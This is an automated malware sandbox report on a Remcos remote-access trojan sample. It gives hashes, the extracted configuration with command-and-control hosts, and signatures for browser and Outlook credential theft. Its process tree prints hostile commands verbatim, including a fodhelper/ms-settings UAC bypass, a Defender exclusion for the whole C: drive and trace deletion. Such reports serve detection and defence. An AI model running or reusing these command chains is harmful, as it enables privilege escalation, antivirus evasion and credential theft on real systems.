Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2024 01:40
Static task
static1
Behavioral task
behavioral1
Sample
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
Resource
win10v2004-20240709-en
General
-
Target
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
-
Size
1.1MB
-
MD5
2d655119c0aa977debf88758f2009729
-
SHA1
40c98ca63e9f78284cddbefddc03b6c6ad070462
-
SHA256
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9
-
SHA512
fe96ee94b8c57c76650288eb589eb41b0430ea45597d025c1ecead87cafd75d5bb58204999ca78f736f54b26b247959d079a498784bdcb274bc159fcc4b395c8
-
SSDEEP
24576:Edd+fYkdMwkRdF36Xq5W2xnXuWmStY6mATIU:EHkvXqE2NXufB6Xv
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:45645
127.0.0.1:56765
latestgrace2024.duckdns.org:56765
latestgrace2024.duckdns.org:45645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2ZXBPR
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/3508-99-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1836-97-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1808-96-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1808-96-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1836-97-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ioeztdcY.pifper.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation ioeztdcY.pif Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 18 IoCs
Processes:
ioeztdcY.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exeper.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 2024 ioeztdcY.pif 4232 alpha.exe 3088 alpha.exe 1924 alpha.exe 2088 alpha.exe 1544 alpha.exe 1680 alpha.exe 4660 alpha.exe 4396 per.exe 2268 alpha.exe 4328 alpha.exe 3536 alpha.exe 1944 alpha.exe 4800 alpha.exe 4872 alpha.exe 1948 alpha.exe 4924 alpha.exe 4672 alpha.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
colorcpl.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts colorcpl.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ycdtzeoi = "C:\\Users\\Public\\Ycdtzeoi.url" e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.execolorcpl.exedescription pid process target process PID 1696 set thread context of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 4100 set thread context of 1836 4100 colorcpl.exe colorcpl.exe PID 4100 set thread context of 1808 4100 colorcpl.exe colorcpl.exe PID 4100 set thread context of 3508 4100 colorcpl.exe colorcpl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
colorcpl.execolorcpl.execolorcpl.exee831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exeioeztdcY.pifextrac32.execolorcpl.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ioeztdcY.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language colorcpl.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEalpha.exePING.EXEpid process 1544 alpha.exe 4892 PING.EXE 3536 alpha.exe 4840 PING.EXE -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4852 taskkill.exe 2232 taskkill.exe 1800 taskkill.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.execolorcpl.execolorcpl.exepid process 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe 1836 colorcpl.exe 1836 colorcpl.exe 3508 colorcpl.exe 3508 colorcpl.exe 1836 colorcpl.exe 1836 colorcpl.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
colorcpl.exepid process 4100 colorcpl.exe 4100 colorcpl.exe 4100 colorcpl.exe 4100 colorcpl.exe 4100 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.execolorcpl.exedescription pid process Token: SeDebugPrivilege 4852 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 1800 taskkill.exe Token: SeDebugPrivilege 3508 colorcpl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exeioeztdcY.pifcmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exedescription pid process target process PID 1696 wrote to memory of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 1696 wrote to memory of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 1696 wrote to memory of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 1696 wrote to memory of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 1696 wrote to memory of 2024 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe ioeztdcY.pif PID 2024 wrote to memory of 3904 2024 ioeztdcY.pif cmd.exe PID 2024 wrote to memory of 3904 2024 ioeztdcY.pif cmd.exe PID 3904 wrote to memory of 4708 3904 cmd.exe extrac32.exe PID 3904 wrote to memory of 4708 3904 cmd.exe extrac32.exe PID 3904 wrote to memory of 4232 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4232 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 3088 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 3088 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1924 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1924 3904 cmd.exe alpha.exe PID 1924 wrote to memory of 1972 1924 alpha.exe extrac32.exe PID 1924 wrote to memory of 1972 1924 alpha.exe extrac32.exe PID 3904 wrote to memory of 2088 3904 cmd.exe TiWorker.exe PID 3904 wrote to memory of 2088 3904 cmd.exe TiWorker.exe PID 2088 wrote to memory of 4404 2088 alpha.exe extrac32.exe PID 2088 wrote to memory of 4404 2088 alpha.exe extrac32.exe PID 3904 wrote to memory of 1544 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1544 3904 cmd.exe alpha.exe PID 1544 wrote to memory of 4892 1544 alpha.exe PING.EXE PID 1544 wrote to memory of 4892 1544 alpha.exe PING.EXE PID 3904 wrote to memory of 3864 3904 cmd.exe cmd.exe PID 3904 wrote to memory of 3864 3904 cmd.exe cmd.exe PID 3904 wrote to memory of 1680 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1680 3904 cmd.exe alpha.exe PID 1680 wrote to memory of 2964 1680 alpha.exe extrac32.exe PID 1680 wrote to memory of 2964 1680 alpha.exe extrac32.exe PID 1696 wrote to memory of 2548 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe extrac32.exe PID 1696 wrote to memory of 2548 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe extrac32.exe PID 1696 wrote to memory of 2548 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe extrac32.exe PID 3904 wrote to memory of 4660 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4660 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4396 3904 cmd.exe per.exe PID 3904 wrote to memory of 4396 3904 cmd.exe per.exe PID 1696 wrote to memory of 4100 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe colorcpl.exe PID 1696 wrote to memory of 4100 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe colorcpl.exe PID 1696 wrote to memory of 4100 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe colorcpl.exe PID 1696 wrote to memory of 4100 1696 e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe colorcpl.exe PID 3904 wrote to memory of 2268 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 2268 3904 cmd.exe alpha.exe PID 2268 wrote to memory of 4852 2268 alpha.exe taskkill.exe PID 2268 wrote to memory of 4852 2268 alpha.exe taskkill.exe PID 3904 wrote to memory of 4328 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4328 3904 cmd.exe alpha.exe PID 4328 wrote to memory of 2232 4328 alpha.exe taskkill.exe PID 4328 wrote to memory of 2232 4328 alpha.exe taskkill.exe PID 3904 wrote to memory of 3536 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 3536 3904 cmd.exe alpha.exe PID 3536 wrote to memory of 4840 3536 alpha.exe PING.EXE PID 3536 wrote to memory of 4840 3536 alpha.exe PING.EXE PID 3904 wrote to memory of 1944 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1944 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4800 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4800 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4872 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4872 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1948 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 1948 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4924 3904 cmd.exe alpha.exe PID 3904 wrote to memory of 4924 3904 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe"C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Users\Public\Libraries\ioeztdcY.pifC:\Users\Public\Libraries\ioeztdcY.pif2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D65B.tmp\D65C.tmp\D65D.bat C:\Users\Public\Libraries\ioeztdcY.pif"3⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:4708
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:4232 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:3088 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:1972
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:4404
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4892 -
C:\Windows\system32\cmd.execmd.exe4⤵PID:3864
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:2964
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
PID:4660 -
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4396 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4852 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4840 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:1944 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:4800 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:4872 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1948 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:4924 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM cmd.exe4⤵
- Executes dropped EXE
PID:4672 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF2⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4100 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\qitlpebdemevmkzmyhzvf"3⤵PID:2344
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\qitlpebdemevmkzmyhzvf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1836 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\tkyeqwmesuwioqnqpslxqmffq"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1808 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\dfewihxygconywcuzcyqtrawzgjd"3⤵PID:2888
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\dfewihxygconywcuzcyqtrawzgjd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:1472
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:2088
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130B
MD532693c34a9397b2bbc4ab5f93a905855
SHA12feef95ed32058ed786dadd79ec806069228a5ba
SHA256cf806a64c3d34143bfea5841501905e21d48947044a5ef9ff8f0b6ea216dc414
SHA5124b212fb2052f456856aae6da995c2206cff55c8a7f478be89882309d30186fed85c26e4c8ca3e8a0358d983d233a6fbcd1e76a1c51fadddfbd13801256d4cd08
-
Filesize
1KB
MD554147a112fd4c4fffbdeb2eeab926f59
SHA17f4ae3d3dd6202e47bc02438a947065c7ed115a9
SHA256b040ccd004e2e55f8ad1b022388bbcc72eefd37f122ec2c5ef1601ecabd7dc46
SHA51220c214b5efb1c70df2704fb487d9ba4fddbc87e1e295d9b7320ce1617f532dc0fd814a016f91ae161ba506a20dcbcea337c6bbec74edb71824035334608b2488
-
Filesize
4KB
MD5982ebb238759653970e22ee9fad24470
SHA115fca6be8cc4a276c9f70a73f28c52c3b0eead15
SHA256c8b9cad5602932ea51b923f39f4b2d9aedf1f4915880d89032ab6636acaf9bea
SHA512c8777edf0dd3e72e0cf3bb89db2bc7856fed0eeca7199806fec341e9168899e3b700c73a6b2e7cb0e8ccc5523116d6ecfde5c9ebcc83288a162dd1b0ea78201b
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
Filesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459